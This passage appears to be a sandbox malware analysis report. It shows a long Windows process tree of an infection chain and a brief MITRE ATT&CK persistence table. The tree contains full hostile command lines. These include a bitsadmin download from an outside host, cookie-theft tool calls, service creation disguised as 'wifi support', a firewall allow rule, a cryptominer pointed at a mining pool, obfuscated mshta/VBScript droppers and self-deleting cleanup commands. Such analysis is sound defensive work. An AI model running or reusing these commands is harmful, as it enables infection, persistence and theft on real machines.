                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:4492
                                                              • C:\Users\Admin\Documents\YKAJEPvEEnw08H82hReUSV3N.exe
                                                                "C:\Users\Admin\Documents\YKAJEPvEEnw08H82hReUSV3N.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Drops file in Program Files directory
                                                                PID:4916
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:2848
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:6044
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5908
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5644
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5076
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:4280
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5116
                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                7⤵
                                                                                • Download via BitsAdmin
                                                                                PID:6044
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -psem3MClgGowU1IW -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                7⤵
                                                                                • Drops file in Program Files directory
                                                                                PID:5544
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ps6ek4NyqJ7KMDc8 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                7⤵
                                                                                  PID:4796
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:4640
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      8⤵
                                                                                        PID:1804
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:544
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:5624
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            8⤵
                                                                                              PID:5660
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:1404
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:4480
                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\YpwZeOdFLWWW\YpwZeOdFLWWW.dll" YpwZeOdFLWWW
                                                                                                7⤵
                                                                                                • Loads dropped DLL
                                                                                                PID:5912
                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\YpwZeOdFLWWW\YpwZeOdFLWWW.dll" YpwZeOdFLWWW
                                                                                                  8⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in System32 directory
                                                                                                  PID:6140
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                • Drops file in Program Files directory
                                                                                                PID:4312
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:4680
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:5664
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:5196
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa6B8E.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:1236
                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                    7⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5828
                                                                                                • C:\Users\Admin\Documents\Zpj72qQyKi9xTPA94VHCSEVE.exe
                                                                                                  "C:\Users\Admin\Documents\Zpj72qQyKi9xTPA94VHCSEVE.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3676
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                    7⤵
                                                                                                      PID:5652
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /f /im chrome.exe
                                                                                                        8⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5560
                                                                                                  • C:\Users\Admin\Documents\V2B21EDsxFYZhSdW8XaVsil3.exe
                                                                                                    "C:\Users\Admin\Documents\V2B21EDsxFYZhSdW8XaVsil3.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1232
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 656
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Program crash
                                                                                                      PID:5012
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 644
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Program crash
                                                                                                      PID:2240
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 676
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:1588
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 648
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:4912
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 1056
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:5256
                                                                                                  • C:\Users\Admin\Documents\dcbEzJc5ZO9xbSzLGag3P59z.exe
                                                                                                    "C:\Users\Admin\Documents\dcbEzJc5ZO9xbSzLGag3P59z.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:344
                                                                                                    • C:\Users\Admin\Documents\dcbEzJc5ZO9xbSzLGag3P59z.exe
                                                                                                      C:\Users\Admin\Documents\dcbEzJc5ZO9xbSzLGag3P59z.exe
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2752
                                                                                                  • C:\Users\Admin\Documents\CUvtleCSb7E_zu7kYpy9pqtO.exe
                                                                                                    "C:\Users\Admin\Documents\CUvtleCSb7E_zu7kYpy9pqtO.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4636
                                                                                                    • C:\Users\Admin\Documents\CUvtleCSb7E_zu7kYpy9pqtO.exe
                                                                                                      "C:\Users\Admin\Documents\CUvtleCSb7E_zu7kYpy9pqtO.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:5152
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:640
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\sonia_6.exe
                                                                                                  sonia_6.exe
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2256
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3048
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4416
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    6⤵
                                                                                                      PID:908
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      6⤵
                                                                                                        PID:5904
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                    4⤵
                                                                                                      PID:3292
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 452
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3936
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                      4⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:200
                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                1⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:884
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                  2⤵
                                                                                                  • Checks processor information in registry
                                                                                                  • Modifies registry class
                                                                                                  PID:3744
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                  2⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Checks processor information in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Modifies registry class
                                                                                                  PID:4228
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS01CD24A4\sonia_2.exe
                                                                                                sonia_2.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1600
                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                1⤵
                                                                                                • Process spawned unexpected child process
                                                                                                PID:1556
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2168
                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                1⤵
                                                                                                • Process spawned unexpected child process
                                                                                                PID:6044
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Modifies registry class
                                                                                                  PID:6056
                                                                                              • C:\Users\Admin\AppData\Local\Temp\EC35.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\EC35.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:5980
                                                                                              • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                C:\Windows\servicing\TrustedInstaller.exe
                                                                                                1⤵
                                                                                                  PID:5644
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                  1⤵
                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                  PID:4596
                                                                                                • C:\Users\Admin\AppData\Local\Temp\9E8F.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\9E8F.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:5812
                                                                                                • C:\Users\Admin\AppData\Local\Temp\A0A3.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\A0A3.exe
                                                                                                  1⤵
                                                                                                    PID:4960
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\wzflcnvs\
                                                                                                      2⤵
                                                                                                        PID:3960
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nfowtgsm.exe" C:\Windows\SysWOW64\wzflcnvs\
                                                                                                        2⤵
                                                                                                          PID:4368
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          "C:\Windows\System32\sc.exe" create wzflcnvs binPath= "C:\Windows\SysWOW64\wzflcnvs\nfowtgsm.exe /d\"C:\Users\Admin\AppData\Local\Temp\A0A3.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                          2⤵
                                                                                                            PID:5480
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            "C:\Windows\System32\sc.exe" description wzflcnvs "wifi internet conection"
                                                                                                            2⤵
                                                                                                              PID:4448
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              "C:\Windows\System32\sc.exe" start wzflcnvs
                                                                                                              2⤵
                                                                                                                PID:4532
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                2⤵
                                                                                                                  PID:5852
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A298.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\A298.exe
                                                                                                                1⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks for any installed AV software in registry
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5116
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AAC7.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\AAC7.exe
                                                                                                                1⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks processor information in registry
                                                                                                                • NTFS ADS
                                                                                                                PID:5556
                                                                                                                • C:\ProgramData\F5BM4EG4ZGI797BC.exe
                                                                                                                  "C:\ProgramData\F5BM4EG4ZGI797BC.exe"
                                                                                                                  2⤵
                                                                                                                    PID:4876
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im AAC7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\AAC7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                    2⤵
                                                                                                                      PID:1804
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /im AAC7.exe /f
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:4988
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout /t 6
                                                                                                                        3⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:5436
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ADE5.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ADE5.exe
                                                                                                                    1⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:496
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B0E3.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B0E3.exe
                                                                                                                    1⤵
                                                                                                                      PID:6136
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B46E.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B46E.exe
                                                                                                                      1⤵
                                                                                                                        PID:5164
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:4912
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:5948
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:4236
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:4588
                                                                                                                              • C:\Windows\SysWOW64\wzflcnvs\nfowtgsm.exe
                                                                                                                                C:\Windows\SysWOW64\wzflcnvs\nfowtgsm.exe /d"C:\Users\Admin\AppData\Local\Temp\A0A3.exe"
                                                                                                                                1⤵
                                                                                                                                  PID:5196
                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                    svchost.exe
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:3504
                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                      3⤵
                                                                                                                                        PID:5112
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4972
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:2848
                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:3744
                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:5272
                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:5532
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\35C5.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\35C5.exe
                                                                                                                                              1⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              PID:4620
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 35C5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\35C5.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                2⤵
                                                                                                                                                  PID:5492
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /im 35C5.exe /f
                                                                                                                                                    3⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:1408
                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                    timeout /t 6
                                                                                                                                                    3⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:5916
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\39BD.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\39BD.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:5588
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBSCRipT: cLoSe ( CREATeObJECT ( "WsCrIPt.SHEll" ).RUN ( "C:\Windows\system32\cmd.exe /c Type ""C:\Users\Admin\AppData\Local\Temp\39BD.exe"" > UfB0QT.EXE && StarT UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f & If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\39BD.exe"" ) do taskkill -iM ""%~Nxg"" -F " , 0 , trUE) )
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4688
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c Type "C:\Users\Admin\AppData\Local\Temp\39BD.exe" > UfB0QT.EXE && StarT UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f & If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\39BD.exe" ) do taskkill -iM "%~Nxg" -F
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5276
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE
                                                                                                                                                            UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4668
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBSCRipT: cLoSe ( CREATeObJECT ( "WsCrIPt.SHEll" ).RUN ( "C:\Windows\system32\cmd.exe /c Type ""C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE"" > UfB0QT.EXE && StarT UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f & If ""/pcakg5O7tt4niFXuNUgbc95f "" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE"" ) do taskkill -iM ""%~Nxg"" -F " , 0 , trUE) )
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:2168
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c Type "C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE" > UfB0QT.EXE && StarT UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f & If "/pcakg5O7tt4niFXuNUgbc95f " == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE" ) do taskkill -iM "%~Nxg" -F
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4124
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbsCRIPT:clOSE( cREaTeobjECt ( "wScRIpT.SHeLl" ). rUN ( "CmD.ExE /q /C ECho Zb%TIME%> 657AxI.I & ecHO | SeT /p = ""MZ"" >O_N0F.hv & cOpy /y /B O_N0F.HV+ eSMMZu4.s + TWR2TUV.M + Hc6~R.I + 657AxI.i BKO6TEE.qur & stArT regsvr32.exe /U -s BKO6TEe.qur " , 0, tRUE ) )
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:5448
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /q /C ECho Zb%TIME%> 657AxI.I & ecHO | SeT /p = "MZ" >O_N0F.hv & cOpy /y /B O_N0F.HV+ eSMMZu4.s + TWR2TUV.M + Hc6~R.I + 657AxI.i BKO6TEE.qur & stArT regsvr32.exe /U -s BKO6TEe.qur
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:5264
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>O_N0F.hv"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:5772
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:5092
                                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                regsvr32.exe /U -s BKO6TEe.qur
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:1244
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill -iM "39BD.exe" -F
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:5660
                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5996
                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4356

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                      Persistence

                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                      2
                                                                                                                                                                      T1031

                                                                                                                                                                      New Service

                                                                                                                                                                      1
                                                                                                                                                                      T1050

                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                      2
                                                                                                                                                                      T1060

